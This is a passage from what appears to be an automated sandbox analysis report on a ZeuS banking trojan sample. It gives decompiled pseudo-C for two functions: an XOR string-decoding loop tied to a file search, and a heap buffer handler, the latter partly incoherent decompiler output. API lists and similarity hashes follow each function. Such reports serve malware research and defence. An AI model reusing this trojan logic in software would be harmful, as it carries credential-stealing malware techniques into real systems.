									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E0040F34A(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E00405ED9(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E004055DA(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E00414FA2();
							_t157 = E00405865(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E0040F34A(0x90, _t171);
					_v648 = _t171;
					E0040A91B( &_v524,  &_v648, _t177, 1, 5, E00414FBC, _a4, 0, 0, 0);
					goto L31;
				}
			}

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • StrStrIA.SHLWAPI(?,?,?,?), ref: 004150E2
  • StrStrIA.SHLWAPI(?,?), ref: 004150F4
  • StrStrIA.SHLWAPI(?,?), ref: 00415104
  • StrStrIA.SHLWAPI(?,?), ref: 00415116
    • Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
    • Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
    • Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
    • Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
    • Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
    • Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
  • String ID:
  • API String ID: 1075381090-0
  • Opcode ID: 11f419a4b4b3535076f168a56081f9b6e821dab2eccccb81fd2df71091b017a1
  • Instruction ID: 52f872ad30b7466ef2e2b938590e5b8dc5ac912a01d05dd39a6db22d60f4a30b
  • Opcode Fuzzy Hash: 11f419a4b4b3535076f168a56081f9b6e821dab2eccccb81fd2df71091b017a1
  • Instruction Fuzzy Hash: BF718A325087009FC721EF65C801ADBB7E5AFC8314F04096EF895A7292D738DD8ACB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%
			E00404BB4(void* __eax, intOrPtr* __ebx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t22;
				signed short _t31;
				intOrPtr _t35;
				signed int _t37;
				intOrPtr* _t47;

				_t35 = _a4;
				_t14 = E00405D35(_t35);
				_t47 = _t14;
				_t15 = _t14 +  *_t14;
				 *_t15 =  *_t15 + _t15;
				 *__ebx =  *__ebx + __ebx;
				asm("std");
				if( *__ebx <= 0) {
					_push(__ebx);
					EnterCriticalSection(0x4223b8);
					_t31 = ( *0x4223b4 & 0x0000ffff) + _t47;
					if(_t31 <= 0x3e8) {
						_t16 = E00405171(_t31 + _t31, 0x4223ac);
						if(_t16 != 0) {
							_t37 =  *0x4223ac; // 0x0
							_t16 = E00405222(_t37 + ( *0x4223b4 & 0x0000ffff) * 2, _a4, _t47 + _t47);
							 *0x4223b4 = _t31;
						}
					} else {
						_t16 = E00405171(0x7d0, 0x4223ac);
						if(_t16 != 0) {
							_t21 = 0x3e8 - _t47;
							_t22 =  *0x4223ac; // 0x0
							E00405222(_t22, _t22 + (( *0x4223b4 & 0x0000ffff) - 0x3e8 - _t47) * 2, 0x3e8 - _t47 + _t21);
							_t16 = E00405222(0x3e8 - _t47 + _t21 +  *0x4223ac, _v8, _t47 + _t47);
							 *0x4223b4 = 0x3e8;
						}
					}
					LeaveCriticalSection(0x4223b8);
				} else {
					EnterCriticalSection(0x4223b8);
					asm("adc byte [edx], 0x40");
					_push( *0x4223ac);
					asm("lodsb");
					E004051E6();
					 *0x4223ac =  *0x4223ac & 0x00000000;
					_push(0x4223b8);
					 *0x4223b4 = 0;
					 *0x4223b4 = 0;
					_t16 = 0x23;
					asm("adc eax, 0x401288");
				}
				return _t16;
			}

APIs
  • EnterCriticalSection.KERNEL32(004223B8), ref: 00404BD1
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • LeaveCriticalSection.KERNEL32(004223B8), ref: 00404BF2
  • EnterCriticalSection.KERNEL32(004223B8), ref: 00404C03
  • LeaveCriticalSection.KERNEL32(004223B8), ref: 00404C9C
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterLeave$FreeHeap
  • String ID:
  • API String ID: 1946732658-0
  • Opcode ID: 98082d35d31daef01d7124e6632e145c6764c3c6cff7e0a88f377e502cd866b0
  • Instruction ID: 7278ae7a32eb944289f3442de10c39b85b046942c1482217e93f18ba5a6ff180
  • Opcode Fuzzy Hash: 98082d35d31daef01d7124e6632e145c6764c3c6cff7e0a88f377e502cd866b0
  • Instruction Fuzzy Hash: 52218E71601214FBC720DFA4EE94A6A37A8EF90318740443FFD01A62A5DABD5806DB5D
Uniqueness

Uniqueness Score: -1.00%